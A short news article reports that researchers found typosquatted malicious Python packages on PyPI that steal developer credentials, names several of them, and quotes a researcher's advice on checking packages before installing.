Discovery of Python programming libraries that hide security threats
Threat actors use typosquatting to attack Python developers (opens in a new tab) with malware, researchers said.
Spectralops.io experts recently scanned PyPI, a software repository for Python programmers, and found ten malicious packages on the platform. All of these have been given names almost identical to the names of legitimate packages in order to trick developers into downloading and adopting the tainted ones.
This type of attack is called typosquatting and is common among cybercriminals. It’s not only used on code repositories (although we’ve seen plenty of examples on GitHub, for example, in the past), but also in phishing emails, fake websites, and data theft. ‘identify.
Thousands of developers threatened
If victims adopted these packages, they would be giving threat actors the keys to their realms, since the malware enables private data theft, as well as stealing developer credentials. Attackers would then send the data to a third party, with victims never knowing what happened. To date, Spectralops recalls, PyPi has over 600,000 active users, suggesting that the threat landscape is quite large.
“These attacks rely on the fact that the Python installation process can include arbitrary code snippets, which are a place where malicious players can put their malicious code,” explained Ori Abramovsky, Data Science Lead at Spectralops.io. . “We discovered this by using machine learning models that analyze the code of these packages and automatically alert the bad guys.”
Here is the full list of affected packages:
- Pyg-utils, Pymocks and PyProto2
- Free-net-vpn and Free-net-vpn2
The researchers contacted PyPI, which shortly afterwards removed the malicious packages from its repository. Nevertheless, developers who have downloaded them in the past are still at risk and should refresh their passwords and other login credentials, just in case.
“What’s remarkable here is how common these malicious packages are,” Abramovsky continued. “They are simple, but dangerous. Personally, once I encountered these types of attacks, I started double-checking every Python package I use. Sometimes I even download it and manually observe its code before installing it.